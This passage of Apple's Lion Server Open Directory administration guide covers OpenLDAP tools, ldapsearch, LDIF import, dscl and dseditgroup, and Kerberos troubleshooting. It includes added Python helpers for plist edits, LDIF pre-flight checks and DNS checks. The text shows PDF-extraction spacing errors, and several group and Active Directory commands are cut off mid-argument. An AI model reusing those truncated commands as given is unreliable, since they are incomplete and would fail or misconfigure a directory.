Instead of restoring to a s erver that is an Open Directory master, you can restore to a standalone server. This server becomes an Open Directory mas ter with directory and authentication data from the archive. The restored data includes the LDAP, Kerberos, and pass word s erver files lis ted above, plus the local directory domain and ass ociated s hadow pass word files. In addition, slapconfig preserves the local user account you us ed in the login window. After restoring, the mas ter contains the user account records from the archive plus the account you used in the login window. If the archive contains a user account that conflicts with the account you us ed in the login window, the account from the archive is ignored. WARNING: If you res tore a standalone s erver, the existing directory records and authentication data are not retained, except for the user account you us ed in the login window.

To replace the directory and authentication data on a standalone server with data from an Open Directory archive, enter:
$ sudo slapconfig -restoredb archive-path
Replace archive-path with the path to the archive file.

For more information about slapconfig, see its man page.


Manage OpenLDAP
To provide directory services for mixed-platform environments, Open Directory uses OpenLDAP, the open source implementation of LDAP. A common language for directory access lets you consolidate information from different platforms and define a single name space for network resources. Whether you have Mac, Windows, or Linux computers on your network, you can set up and manage a single directory, eliminating the need to maintain a separate directory or separate user records for each platform.

Configure OpenLDAP
The OpenLDAP server daemon is slapd, in /usr/libexec/. The primary configuration files for OpenLDAP are located in /etc/openldap/. There you find the slapd.conf and slapd_macosxserver.conf files, which contain configuration information. slapd reads and writes its live configuration in the config backend, an LDAP database stored under /etc/openldap/slapd.d and exposed through LDAP under the search base cn=config. The old /etc/openldap/slapd.conf and slapd_macosxserver.conf files are still written but are not read by slapd; use them only as a reference for the one-to-one corresponding settings in the olcGlobal object class under the config entry. The attributes and object classes of the config backend carry the prefix olc. The directory administrator can modify configuration settings such as ACL or schema settings by using Workgroup Manager with the inspector mode turned on, or by using dscl. Some sizelimit, timelimit, and SSL settings should only be set using Server Admin.

Use the slapd and slurpd daemons to configure LDAP
To configure the slapd and slurpd LDAP daemons and related search policies, use the slapconfig tool. For more information, see the slapconfig man page.

Standard distribution tools
Two types of tools come with OpenLDAP:
- Tools that operate directly on the LDAP databases; these tools begin with slap.
- Tools that go through the LDAP protocol; these tools begin with ldap.
You must run the slap tools on the computer hosting the LDAP database. When using the slap tools, shut down the LDAP service. If you don't, your database can get out of sync. These tools are included in the standard OpenLDAP distribution:
Tool                     Used to
/usr/bin/ldapadd         Add entries to the LDAP directory.
/usr/bin/ldapcompare     Compare a directory entry's actual attributes with known attributes.
/usr/bin/ldapdelete      Delete entries from the LDAP directory.
/usr/bin/ldapmodify      Change an entry's attributes.
/usr/bin/ldapmodrdn      Change an entry's relative distinguished name (RDN).
/usr/bin/ldappasswd      Set the password for an LDAP user. Apple recommends using passwd instead of ldappasswd. For more information, see the passwd man page.
/usr/bin/ldapsearch      Search the LDAP directory.
/usr/bin/ldapwhoami      Obtain the primary authorization identity associated with a user.
/usr/sbin/slapadd        Add entries to the LDAP directory.
/usr/sbin/slapcat        Export LDAP Data Interchange Format (LDIF) files.
/usr/sbin/slapindex      Regenerate directory indexes.
/usr/sbin/slappasswd     Generate user password hashes.


LDAP idle rebinding options


The following LDAPv3 plug-in parameters are used in the file /Library/Preferences/DirectoryService/DSLDAPv3PlugInConfig.plist.

Delay rebind
This parameter specifies how long the LDAP plug-in waits before attempting to reconnect to a server that fails to respond. You can increase this value to prevent continuous reconnection attempts.
<key>Delay Rebind Try in seconds</key>
<integer>n</integer>
You can find this parameter in the DSLDAPv3PlugInConfig.plist file near <key>OpenClose Timeout in seconds</key>. If it isn't there, add it there.

Idle timeout
This parameter specifies how long the LDAP plug-in sits idle before disconnecting from the server. You can adjust this value to reduce the load that idle connections from remote clients place on the server.
<key>Idle Timeout in minutes</key>
<integer>n</integer>
If this parameter doesn't exist in the DSLDAPv3PlugInConfig.plist file, add it near <key>OpenClose Timeout in seconds</key>.
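The edit described above, as an added example that is not part of Apple's documentation: a script that inserts the two tuning keys into DSLDAPv3PlugInConfig.plist without disturbing any other setting. It assumes the keys belong in every dictionary that already carries "OpenClose Timeout in seconds" (the place the text says to put them), so it walks the plist generically instead of relying on Apple's exact layout; the sample plist embedded below is constructed for the example, not copied from a real system.

```python
"""Add "Delay Rebind Try in seconds" and "Idle Timeout in minutes" to an LDAPv3
plug-in configuration plist, next to "OpenClose Timeout in seconds"."""
import plistlib
import shutil
import sys

ANCHOR_KEY = "OpenClose Timeout in seconds"
DELAY_KEY = "Delay Rebind Try in seconds"
IDLE_KEY = "Idle Timeout in minutes"
PLIST_PATH = "/Library/Preferences/DirectoryService/DSLDAPv3PlugInConfig.plist"


def add_rebind_settings(node, delay_seconds, idle_minutes, overwrite=False):
    """Recursively visit dicts and lists. In each dict that carries ANCHOR_KEY, add
    DELAY_KEY and IDLE_KEY when missing (or unconditionally when overwrite is set).
    Returns the number of keys written, so 0 means the file already had them."""
    written = 0
    if isinstance(node, dict):
        if ANCHOR_KEY in node:
            for key, value in ((DELAY_KEY, delay_seconds), (IDLE_KEY, idle_minutes)):
                if overwrite or key not in node:
                    node[key] = int(value)      # serialized as <integer>n</integer>
                    written += 1
        for child in node.values():
            written += add_rebind_settings(child, delay_seconds, idle_minutes, overwrite)
    elif isinstance(node, list):
        for child in node:
            written += add_rebind_settings(child, delay_seconds, idle_minutes, overwrite)
    return written


def update_plist_bytes(data, delay_seconds, idle_minutes, overwrite=False):
    """Accept XML or binary plist bytes; return (updated XML plist bytes, keys written)."""
    root = plistlib.loads(data)
    written = add_rebind_settings(root, delay_seconds, idle_minutes, overwrite)
    return plistlib.dumps(root, fmt=plistlib.FMT_XML), written


def rebind_settings(data):
    """Read back [(delay, idle)] for every dict that carries ANCHOR_KEY; None when absent."""
    found = []

    def walk(node):
        if isinstance(node, dict):
            if ANCHOR_KEY in node:
                found.append((node.get(DELAY_KEY), node.get(IDLE_KEY)))
            for child in node.values():
                walk(child)
        elif isinstance(node, list):
            for child in node:
                walk(child)

    walk(plistlib.loads(data))
    return found


# Constructed stand-in for one LDAPv3 server configuration; not a copy of a real file.
SAMPLE_PLIST = plistlib.dumps({
    "LDAP PlugIn Version": "example",
    "LDAP Server Configs": [
        {"Server": "ldap.example.com", "Port Number": 389, "SSL": False, ANCHOR_KEY: 15},
    ],
})

if __name__ == "__main__":
    # Usage: sudo python3 this.py [delay_seconds idle_minutes]
    # Edits PLIST_PATH in place after saving a .bak copy; the directory service
    # daemon must be restarted for the new values to take effect.
    delay, idle = (int(a) for a in sys.argv[1:3]) if len(sys.argv) >= 3 else (120, 5)
    with open(PLIST_PATH, "rb") as f:
        original = f.read()
    updated, written = update_plist_bytes(original, delay, idle)
    if written:
        shutil.copyfile(PLIST_PATH, PLIST_PATH + ".bak")
        with open(PLIST_PATH, "wb") as f:
            f.write(updated)
    print(f"{written} key(s) written")
```

The script writes a key only when it is absent, so running it twice is harmless; pass overwrite=True from your own code when you want to change values that are already present.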


Search the LDAP server


The ldapsearch tool connects to an LDAP server, authenticates, finds entries, and returns attributes of the entries found. To query the LDAP server for a user's information:

Enter the following command, replacing the example search base (cn=users,dc=example,dc=com) with an actual search base:
$ ldapsearch -H ldap://127.0.0.1 -b cn=users,dc=example,dc=com
By default, ldapsearch binds to the LDAP server using Simple Authentication and Security Layer (SASL). If the server doesn't support SASL, you see this error message:
ldap_sasl_interactive_bind_s: No such attribute (16)
To avoid this error, include the -x option when you enter the command. For example:
$ ldapsearch -h 192.168.100.1 -b "dc=example,dc=com" -x
The -x option forces ldapsearch to use simple authentication instead of SASL. The -x option also works on other LDAP tools. Keep in mind that a simple bind with a DN and password (-D with -w or -W) sends the password to the server in clear text unless the connection is protected, so for authenticated queries across a network use an ldaps:// URL or the -Z option (StartTLS). An anonymous simple bind, as in the root DSE queries below, sends no credential.

You can also use ldapsearch for debugging issues with LDAP, independent of the directory services LDAPv3 plug-in. For example, you can read the root directory server entry (DSE) like the following (where -LLL omits some output, -x means no SASL, -h specifies the hostname, -b specifies the search base and -s specifies the type of search):
$ ldapsearch -LLL -x -h ldap.psu.edu -b "" -s base
dn:
namingcontexts: CN=SCHEMA
namingcontexts: CN=LOCALHOST
namingcontexts: CN=PWDPOLICY
namingcontexts: CN=IBMPOLICIES
namingcontexts: DC=PSU,DC=EDU
subschemasubentry: cn=schema
supportedextension: 1.3.18.0.2.12.1
supportedextension: 1.3.18.0.2.12.3
supportedextension: 1.3.18.0.2.12.5
supportedextension: 1.3.18.0.2.12.6
supportedextension: 1.3.18.0.2.12.15
supportedextension: 1.3.18.0.2.12.16
supportedextension: 1.3.18.0.2.12.17
supportedextension: 1.3.18.0.2.12.19
supportedextension: 1.3.18.0.2.12.44
supportedextension: 1.3.18.0.2.12.24
supportedextension: 1.3.18.0.2.12.22
supportedextension: 1.3.18.0.2.12.20
supportedextension: 1.3.18.0.2.12.28
supportedextension: 1.3.18.0.2.12.30
supportedextension: 1.3.18.0.2.12.26
supportedextension: 1.3.6.1.4.1.1466.20037
supportedextension: 1.3.18.0.2.12.35
supportedextension: 1.3.18.0.2.12.40
supportedextension: 1.3.18.0.2.12.46
supportedextension: 1.3.18.0.2.12.37
supportedcontrol: 2.16.840.1.113730.3.4.2
supportedcontrol: 1.3.18.0.2.10.5
supportedcontrol: 1.2.840.113556.1.4.473
supportedcontrol: 1.2.840.113556.1.4.319
supportedcontrol: 1.3.6.1.4.1.42.2.27.8.5.1
supportedcontrol: 1.2.840.113556.1.4.805
supportedcontrol: 2.16.840.1.113730.3.4.18
supportedcontrol: 1.3.18.0.2.10.15
supportedcontrol: 1.3.18.0.2.10.18
security: none
port: 389
supportedsaslmechanisms: CRAM-MD5
supportedsaslmechanisms: DIGEST-MD5
supportedldapversion: 2
supportedldapversion: 3
ibmdirectoryversion: 5.2
ibm-ldapservicename: tr17n01.aset.psu.edu
ibm-serverId: 0f876740-64d2-102b-8f0b-8ab9d7eaa702
ibm-supportedacimechanisms: 1.3.18.0.2.26.3
ibm-supportedacimechanisms: 1.3.18.0.2.26.4
ibm-supportedacimechanisms: 1.3.18.0.2.26.2
vendorname: International Business Machines (IBM)
vendorversion: 5.2
ibm-sslciphers: N/A
ibm-slapdisconfigurationmode: FALSE
ibm-slapdSizeLimit: 200
ibm-slapdTimeLimit: 900
ibm-slapdDerefAliases: always
ibm-supportedAuditVersion: 2
ibm-sasldigestrealmname: tr17n01.aset.psu.edu

The root DSE tells you what a server will negotiate before you bind to it. In this output the server reports security: none, still accepts LDAPv2, and offers only the MD5-based SASL mechanisms; the supportedextension value 1.3.6.1.4.1.1466.20037 is the StartTLS extended operation.

If the server is an OpenLDAP server, specify + for operational attributes or specify the attributes of interest:
$ ldapsearch -LLL -x -h xtra.apple.com -b "" -s base +
dn:
structuralObjectClass: OpenLDAProotDSE
namingContexts: dc=apple,dc=com
supportedControl: 2.16.840.1.113730.3.4.18
supportedControl: 2.16.840.1.113730.3.4.2
supportedControl: 1.3.6.1.4.1.4203.1.10.1
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.826.0.1.334810.2.3
supportedExtension: 1.3.6.1.4.1.1466.20037
supportedExtension: 1.3.6.1.4.1.4203.1.11.1
supportedExtension: 1.3.6.1.4.1.4203.1.11.3
supportedFeatures: 1.3.6.1.4.1.4203.1.5.1
supportedFeatures: 1.3.6.1.4.1.4203.1.5.2
supportedFeatures: 1.3.6.1.4.1.4203.1.5.3
supportedFeatures: 1.3.6.1.4.1.4203.1.5.4
supportedFeatures: 1.3.6.1.4.1.4203.1.5.5
supportedLDAPVersion: 3
supportedSASLMechanisms: CRAM-MD5
supportedSASLMechanisms: GSSAPI
subschemaSubentry: cn=Subschema

Here GSSAPI in supportedSASLMechanisms is the Kerberos mechanism that single sign-on clients use, and StartTLS is advertised.

Usually the namingContexts value is the first thing you want to determine:
$ ldapsearch -LLL -x -h xtra.apple.com -b "" -s base namingContexts
dn:
namingContexts: dc=apple,dc=com
After you determine the value, search for a record with a command like this:
$ ldapsearch -LLL -x -h xtra.apple.com -b "dc=apple,dc=com" uid=ajohnson uid cn
dn: uid=ajohnson,cn=users,dc=apple,dc=com
uid: ajohnson
cn: Anne Johnson


Use LDIF files


LDAP Data Interchange Format (LDIF) is a text format for representing LDAP entries. LDAP tools such as ldapadd, ldapmodify, and ldapsearch read and write LDIF files. Here is an example of an LDIF file containing three entries. Multiple entries in an LDIF file are separated by blank lines.

dn: cn=Mei Chen,dc=example,dc=com
cn: Mei Chen
cn: M Chen
objectclass: person
description: file:///tmp/babs
sn: Chen

dn: cn=Anne Johnson,dc=example,dc=com
cn: Anne Johnson
cn: A Johnson
objectclass: person
sn: Johnson

dn: cn=Tom Clark,dc=example,dc=com
cn: Tom Clark
cn: T Clark
objectclass: person
sn: Clark

WARNING: LDAP tools can modify or add entries to the LDAP directory. Changing raw data in a directory can have unexpected and undesirable consequences. You could inadvertently incapacitate users or computers, or you could unintentionally authorize users to access more resources. Review an LDIF file before loading it, and keep a current Open Directory archive so you can recover from a bad import.

To load an LDIF file into the LDAP directory:
$ ldapadd -H ldap://appleserver.example.com -f myusers.ldif
Replace appleserver.example.com with the location of the LDAP directory and myusers.ldif with the name of your LDIF file.
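An added example, not Apple's code, serving both the root DSE queries in "Search the LDAP server" and the LDIF import above. parse_ldif() reads the LDIF that ldapsearch prints and ldapadd consumes; root_dse_findings() reports what a server advertises that matters for credential safety (the StartTLS OID 1.3.6.1.4.1.1466.20037 is the IANA assignment; the "legacy" SASL list is this example's classification, resting on RFC 6331 retiring DIGEST-MD5); preflight_ldif() is the review step the warning calls for, run on a file before `ldapadd -f`. The sensitive-attribute list and both sample inputs are constructed for the example.

```python
"""Parse LDIF, summarize a root DSE, and pre-flight an import file before ldapadd."""
import base64
import re

STARTTLS = "1.3.6.1.4.1.1466.20037"
# Mechanisms that either send the password (PLAIN, LOGIN, ANONYMOUS sends none) or rest
# on the MD5 challenge-response schemes that RFC 6331 moved to Historic.
LEGACY_SASL = {"PLAIN", "LOGIN", "CRAM-MD5", "DIGEST-MD5", "ANONYMOUS"}
# Attributes in an import file that set credentials or grant membership; assumed list.
SENSITIVE = {"userpassword", "authenticationauthority", "member", "uniquemember", "memberuid"}


def parse_ldif(text):
    """Return [(dn, {attr_lowercase: [values]})]. Handles folded lines (leading space),
    base64 values ('attr:: ...'), comments and the optional version line."""
    entries, dn, attrs = [], None, {}
    for line in re.sub(r"\n ", "", text).splitlines() + [""]:
        if not line:                        # a blank line ends an entry
            if dn is not None:
                entries.append((dn, attrs))
            dn, attrs = None, {}
            continue
        if line.startswith("#") or line.lower().startswith("version:"):
            continue
        name, sep, value = line.partition(":")
        if not sep:
            raise ValueError(f"not an LDIF line: {line!r}")
        if value.startswith(":"):           # attr:: base64-encoded value
            value = base64.b64decode(value[1:].strip()).decode("utf-8")
        else:
            value = value.strip()
        name = name.strip().lower()
        if name == "dn":
            dn = value
        else:
            attrs.setdefault(name, []).append(value)
    return entries


def root_dse_findings(entries):
    """Findings from a root DSE entry (ldapsearch -x -b "" -s base ... +)."""
    _, dse = entries[0]
    findings = []
    if STARTTLS not in dse.get("supportedextension", []):
        findings.append("StartTLS not advertised: a simple bind on port 389 sends the password in clear")
    if "2" in dse.get("supportedldapversion", []):
        findings.append("LDAPv2 still accepted")
    legacy = sorted({m.upper() for m in dse.get("supportedsaslmechanisms", [])} & LEGACY_SASL)
    if legacy:
        findings.append("legacy SASL mechanisms offered: " + ", ".join(legacy))
    return findings


def preflight_ldif(entries, base_dn):
    """Problems that should stop an `ldapadd -f file.ldif`: a DN outside base_dn,
    a duplicate DN, a missing objectClass, or an attribute from SENSITIVE."""
    problems, seen, base = [], set(), base_dn.lower()
    for dn, attrs in entries:
        d = dn.lower()
        if not (d == base or d.endswith("," + base)):
            problems.append(f"{dn}: outside {base_dn}")
        if d in seen:
            problems.append(f"{dn}: duplicate DN")
        seen.add(d)
        if "objectclass" not in attrs:
            problems.append(f"{dn}: no objectClass")
        for attr in sorted(SENSITIVE & attrs.keys()):
            problems.append(f"{dn}: sets {attr}")
    return problems


# Constructed samples: a trimmed root DSE in the style of the OpenLDAP output above,
# and a three-entry import file with two deliberate mistakes.
ROOT_DSE = """\
dn:
structuralObjectClass: OpenLDAProotDSE
namingContexts: dc=example,dc=com
supportedExtension: 1.3.6.1.4.1.1466.20037
supportedLDAPVersion: 3
supportedSASLMechanisms: CRAM-MD5
supportedSASLMechanisms: GSSAPI
"""
USERS_LDIF = """\
dn: cn=Mei Chen,dc=example,dc=com
cn: Mei Chen
cn: M Chen
objectclass: person
sn: Chen

dn: cn=Anne Johnson,dc=example,dc=com
cn: Anne Johnson
objectclass: person
sn: Johnson
userPassword: hunter2

dn: cn=Tom Clark,dc=other,dc=com
cn: Tom Clark
sn: Clark
"""

if __name__ == "__main__":
    for finding in root_dse_findings(parse_ldif(ROOT_DSE)):
        print("DSE:", finding)
    for problem in preflight_ldif(parse_ldif(USERS_LDIF), "dc=example,dc=com"):
        print("LDIF:", problem)
```

To use it against a live server, feed the text of `ldapsearch -LLL -x -h host -b "" -s base +` to parse_ldif() and the file you are about to pass to `ldapadd -f` to preflight_ldif() with your own base DN.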


Kerberize services with an Active Directory server


If your computer is connected to an Active Directory server, you can use the dsconfigad command to Kerberize your services with the Active Directory Kerberos realm. This is commonly used when configuring a magic triangle with an Active Directory server and an Open Directory server.

Enter the following command to Kerberize your services with an Active Directory server:
$ sudo dsconfigad -enablesso


Manage directory service domains


Use dscl, a general-purpose tool, for operating on directory domains. You can create, read, and manage directory data. If invoked without commands, dscl runs in an interactive mode, reading commands from standard input. The following example shows a basic use of the dscl tool.

To verify that you can access an LDAPv3 directory:
$ dscl localhost
> cd /LDAPv3/directory.example.com/Users
> ls
You should see a list of the server's network user accounts.

For more information, see the dscl man page.


Manipulate a single named group record


Use dseditgroup to manipulate a single named group record on the default local directory domain or on the specified directory domain. The following examples show uses for dseditgroup.

To view the attributes of a group in the local directory domain:
$ dseditgroup -o read groupname
To create a group in a domain:
$ dseditgroup -o create -n /LDAPv3/ldap.example.com -u diradmin_name -P diradmin_password -r "Gr
To create a Windows group in a domain and set the domain group relative identifier (RID):
$ dseditgroup -o create -n /LDAPv3/ldap.example.com -u diradmin_name -P diradmin_password -r "Gr
$ dscl -u diradmin_name -P diradmin_password /LDAPv3/ldap.example.com -create /Groups/groupname
To delete a group from a domain:
$ dseditgroup -o delete -n /LDAPv3/ldap.example.com -u diradmin_name -P diradmin_password groupn

Parameter             Description
diradmin_name         Name of the directory administrator
diradmin_password     Password of the directory administrator
Group Name            Real name to add or replace
comment               Comment to add or replace
1234                  Time-to-live, in seconds, to add or replace
some keyword          Keyword to add
groupname             Group name

Passing the directory administrator password with -P puts it in the process list and in your shell history, where other local users can read it. Omit -P so that dseditgroup and dscl prompt for the password instead.

For more information, see the dseditgroup man page.


Add or remove LDAP server configurations


Use dsconfigldap to add or remove LDAP server configurations in directory services.

To add an LDAP server:
$ dsconfigldap -v -a myldap.example.com
To remove an LDAP server:
$ dsconfigldap -v -r myldap.example.com
The -v option reports what the tool does. If the server supports SSL, configure the connection to use it so that directory data and bind credentials don't cross the network in clear text; see the dsconfigldap man page for the options that control this.


Configure the Active Directory connector


Use dsconfigad to configure the Active Directory connector from the command line. dsconfigad has the same functionality for configuring the Active Directory connector as Directory Utility.

To add a computer to a directory:
$ dsconfigad -a computerid -u "administrator" -ou "CN=Computers,OU=Engineering,DC=ads,DC=demo,DC=

Parameter                                            Description
computerid                                           The computer ID to add to the domain.
administrator                                        The user name of a network account that has administrator privileges. The account needs only the right to create computer objects in the target container; don't use a domain administrator account for routine binds.
CN=Computers,OU=Engineering,DC=ads,DC=demo,DC=com    The LDAP distinguished name of the container in which the computer is added. If this is not specified, the default container is used.
domain                                               The fully qualified domain name of the domain used when adding the computer to the directory.

For more information, see the dsconfigad man page.

Lion Server user management

Open Directory services

Solve Open Directory problems

If Kerberos is stopped on an Open Directory master or replica


An Open Directory master requires properly configured DNS so it can provide single sign-on Kerberos authentication.

1. Make sure DNS service is configured to resolve fully qualified DNS names and provide corresponding reverse lookups. DNS must resolve fully qualified DNS names and provide reverse lookups for the master server, replica servers, and other servers that are members of the Kerberos realm. To perform a DNS lookup of a server's DNS name and a reverse lookup of the server's IP address, you can use the Lookup pane of Network Utility (in /Applications/Utilities). For more information about setting up DNS service, see Server Admin Help.
2. Make sure the Open Directory master server's host name is the correct fully qualified DNS name, not the server's local hostname. For example, the host name might be ods.example.com but should not be ods.local. You can see the host name by opening Terminal and entering hostname. If the Open Directory server's host name isn't its fully qualified DNS name, temporarily clear the list of DNS servers and click Apply in the Open Directory server's Network preferences. Then re-enter DNS server IP addresses, starting with the primary DNS server that resolves the Open Directory server's name, and click Apply in Network preferences. If the Open Directory server's host name still isn't its fully qualified DNS name, restart the server.
3. Make sure the Open Directory master server's Network preferences are configured to use the DNS server that resolves the server's name. If the Open Directory master server provides its own DNS service, the server's Network preferences must be configured to use itself as a DNS server.
4. After confirming the correct DNS configuration for the server, start Kerberos. See Start Kerberos after setting up an Open Directory master.
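The DNS conditions in steps 1 and 2, as an added example that is not part of Apple's documentation: a pre-flight check for the master, its replicas, and every server that will join the realm. Each host name must be fully qualified (not bare, not .local), resolve forward, and have a reverse record that maps back to the same name. The resolver functions are injected so the checks can be exercised offline; the default resolvers use the socket module, and the FAKE_A/FAKE_PTR records are constructed for the example.

```python
"""Check that Kerberos realm members have consistent forward and reverse DNS."""
import socket
import sys


def dns_forward(name):
    return socket.gethostbyname(name)


def dns_reverse(ip):
    return socket.gethostbyaddr(ip)[0]


def check_kerberos_host(hostname, forward=dns_forward, reverse=dns_reverse):
    """Return the problems with one realm member's host name; [] means it passed."""
    problems = []
    name = hostname.lower().rstrip(".")
    if "." not in name or name.endswith(".local"):
        problems.append(f"{hostname}: not a fully qualified DNS name "
                        "(a bare or .local host name cannot back a Kerberos realm)")
        return problems
    try:
        ip = forward(name)
    except OSError as err:
        problems.append(f"{hostname}: forward lookup failed ({err})")
        return problems
    try:
        rname = reverse(ip)
    except OSError as err:
        problems.append(f"{hostname}: reverse lookup of {ip} failed ({err})")
        return problems
    if rname.lower().rstrip(".") != name:
        problems.append(f"{hostname}: reverse lookup of {ip} returns {rname}, not {hostname}")
    return problems


def check_realm(master, members, forward=dns_forward, reverse=dns_reverse):
    """Check the master plus every replica and Kerberized server.
    Returns {host: [problems]} containing only the hosts that failed."""
    report = {}
    for host in [master, *members]:
        problems = check_kerberos_host(host, forward, reverse)
        if problems:
            report[host] = problems
    return report


# Constructed records standing in for a DNS zone; nothing below touches the network.
FAKE_A = {"ods.example.com": "192.0.2.10",
          "replica1.example.com": "192.0.2.11",
          "files.example.com": "192.0.2.12"}
FAKE_PTR = {"192.0.2.10": "ods.example.com",
            "192.0.2.11": "replica1.example.com",
            "192.0.2.12": "files"}      # PTR holds a bare name: a common misconfiguration


def fake_forward(name):
    if name not in FAKE_A:
        raise socket.gaierror(f"no A record for {name}")
    return FAKE_A[name]


def fake_reverse(ip):
    if ip not in FAKE_PTR:
        raise socket.herror(f"no PTR record for {ip}")
    return FAKE_PTR[ip]


if __name__ == "__main__":
    # With host names on the command line the real resolver is used (master first);
    # without arguments the constructed zone is checked instead.
    if sys.argv[1:]:
        hosts, fwd, rev = sys.argv[1:], dns_forward, dns_reverse
    else:
        hosts = ["ods.example.com", "replica1.example.com", "files.example.com", "ods.local"]
        fwd, rev = fake_forward, fake_reverse
    for host, problems in check_realm(hosts[0], hosts[1:], fwd, rev).items():
        for problem in problems:
            print("FAIL", problem)
```

Run it from an administrator Mac that uses the same DNS servers the Open Directory master is configured with (step 3), otherwise the check reports the administrator's view of DNS rather than the server's.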


If you can't create an Open Directory replica


If you try to create two replicas simultaneously, one attempt succeeds and the other fails. A subsequent attempt to establish the second replica should succeed. If you still can't create the second replica, go to the folder /var/run/, look for the file slapconfig.lock, and remove it if it exists. Also, view the /Library/Logs/slapconfig.log log file. Alternatively, restart the server.


If you can't connect a replica to your relay


Make sure your relay has not reached its capacity of 32 replicas. Also make sure that you are not connecting to a second-tier replica instead of a first-tier relay.


If you can't join an Open Directory replica to an Open Directory that's a subordinate of an Active Directory server
Before you try to turn the server into a replica of the subordinate Open Directory server, make sure you connect the server to the same Active Directory server as the Open Directory master server you are attempting to connect to. Your replicas must have access to the Active Directory server for Kerberos to work.


If a delay occurs during startup


If a Mac experiences a startup delay while a message about LDAP or directory services appears above the progress bar, the computer could be trying to access an LDAP directory that is not available on your network. Consider the following:
- A pause during startup is normal if a portable computer is not connected to the network that the LDAP server is connected to.
- Use Directory Services under Login Options in Users & Groups preferences to make sure the local directory domain and LDAP configurations are correct.
- Use the Network pane of System Preferences to make sure the computer's network location and other network settings are correct.
- Inspect the physical network connection for faults.


If you can't change a user's Open Directory password


To change the password of a user whose password type is Open Directory, you must be an administrator of the directory domain where the user's record resides. In addition, your user account must have a password type of Open Directory. The user account specified when the Open Directory master was set up (using Server Assistant or the Open Directory service settings in Server Admin) normally has an Open Directory password. You can use this account to set up other user accounts as directory domain administrators with Open Directory passwords. If all else fails, enable the root user account and use it to set up a user account as a directory administrator with an Open Directory password; disable the root account again as soon as that account exists. For information on enabling the root account, see Directory Utility Help (located in the Server app > Tools > Directory Utility).


If a user can't access some services


If a user can access some services that require authentication but not others, temporarily change the user's password to a simple sequence of characters, such as password. If this solves the problem, the user's previous password contained characters that were not recognized by all services. For example, some services accept spaces in passwords while others don't. Use the simple password only for the test, and have the user set a new strong password that avoids the offending characters immediately afterward.


If users can't authenticate for VPN service


Users whose accounts are stored on a server with Mac OS X Server v10.2 can't authenticate to VPN service provided by Mac OS X Server v10.3 through 10.6 or Lion Server. VPN service requires the MS-CHAPv2 authentication method, which isn't supported in Mac OS X Server v10.2.

To enable affected users to log in, move their user accounts to a server with Mac OS X Server v10.3 through 10.6 or Lion Server. Alternatively, if possible, upgrade the older server to Lion Server or later.


If you can't change a user's password type to Open Directory


To change a user's password type to Open Directory authentication, you must be an administrator of the directory domain where the user's record resides. In addition, your user account must be configured for Open Directory authentication. The user account specified when the Open Directory master was set up (using Server Assistant or the Open Directory service settings in Server Admin) has an Open Directory password. You can use this account to set up other user accounts as directory domain administrators with Open Directory passwords.


If users can't log in with accounts in a shared directory domain


Users can't log in using accounts in a shared directory domain if the server hosting the directory isn't accessible. A server can become inaccessible due to a problem with the network, the server software, or the server hardware. Problems with the server hardware or software affect all users trying to log in to a Mac computer. Network problems can affect some users but not others, depending on where the network problem is. Users with mobile user accounts can still log in to a Mac they used previously, and users affected by these problems can log in by using a local user account defined on the computer, such as the user account created during setup after installing Mac OS X Lion.


If you can't log in as an Active Directory user


After configuring a connection to an Active Directory domain in the Services pane of Directory Utility (located in Users & Groups preferences) and adding it to a custom search policy in the Authentication pane, wait 10 or 15 seconds for the change to take effect. Attempts to log in immediately with an Active Directory account do not succeed.


If users can't authenticate using single sign-on Kerberos


When a user or service that uses Kerberos experiences authentication failures, try these remedies:
- Kerberos authentication is based on encrypted time stamps. If there's more than a 5-minute difference between the KDC, client, and service computers, authentication may fail. Make sure the clocks for all computers are synchronized using the Network Time Protocol (NTP) service of a Lion server or another network time server. For information about the NTP service, see NTP.
- Make sure Kerberos is running on the Open Directory master and replicas. See If Kerberos is stopped on an Open Directory master or replica.
- If a Kerberos server used for password validation is not available, reset the user's password to use a server that is available.
- Make sure the server providing the Kerberized service has access to the Kerberos server's directory domain, and make sure this directory domain contains the accounts for users who are trying to authenticate using Kerberos. For information about configuring access to directory domains, see Directory server connections.
- For an Open Directory server's Kerberos realm, make sure the client computer is configured to access the Open Directory server's LDAP directory using the correct search base suffix. The client's LDAPv3 search base suffix setting must match the LDAP directory's search base setting. The client's LDAPv3 search base suffix can be blank if it gets its LDAP mappings from the server. If so, the client uses the LDAP directory's default search base suffix. To check the client's search base suffix setting, open Directory Utility (located in Users & Groups preferences), show the list of LDAPv3 configurations, and choose the item from the LDAP Mappings pop-up menu that's already selected in the menu. For more information, see Change the connection settings for an LDAP or Open Directory server. To check the LDAP directory's search base setting, open Server Admin and look in the Protocols pane of the Settings pane for Open Directory service.
- For information that can help you solve problems, see the KDC log. Also see View Open Directory status and logs.
- If Kerberos was not running when user records were created, imported, or updated from an earlier Mac OS X version, they might not be enabled for Kerberos authentication. A record isn't enabled for Kerberos if its authentication authority attribute lacks the ;Kerberosv5; value. Use the Directory Editor in Directory Utility to see the values of a user record's authentication authority attribute. For more information, see Directory Utility Help. Enable Kerberos for a user record by changing its password type: set the password type to Shadow Password, then set it to Open Directory. For more information, see Change the password type to shadow password and Change the password type to Open Directory.
- If users can't authenticate using single sign-on or Kerberos for services provided by a server that is joined to an Open Directory master's Kerberos realm, the server's computer record might be incorrectly configured in the Open Directory master's LDAP directory. The server's name in the computer group account must be the server's fully qualified DNS name, not just the server's host name. For example, the name could be server2.example.com but not just server2. To correct the record:

1. Delete the server from the computer group account in the LDAP directory. For more information about this and the next step, see Workgroup Manager Help.
2. Add the server to the computer group again.
3. Delegate authority again for joining the server to the Open Directory master's Kerberos realm. For more information, see Delegate authority to join an Open Directory Kerberos realm.
4. Rejoin the server to the Open Directory Kerberos realm. For more information, see Join a server to a Kerberos realm.


If you can't join a server to an Open Directory Kerberos realm


If a user with delegated Kerberos authority can't join a server to an Open Directory master's Kerberos realm, the server's computer record might be incorrectly configured in the Open Directory master's LDAP directory. The server's address in the computer group account must be the server's primary Ethernet address. The primary Ethernet address is the Ethernet ID of the first Ethernet port in the list of network port configurations shown in the server's Network preferences pane.

1. Delete the server from the computer group account in the LDAP directory. For more information about this and the next step, see Workgroup Manager Help.
2. Add the server to the computer group again.
3. Delegate authority again for joining the server to the Open Directory master's Kerberos realm. Skip this step if you can use a Kerberos administrator account (LDAP directory administrator account) to rejoin the server to the Kerberos realm. For more information, see Delegate authority to join an Open Directory Kerberos realm.
4. Rejoin the server to the Open Directory Kerberos realm. For more information, see Join a server to a Kerberos realm.

Lion Server user management

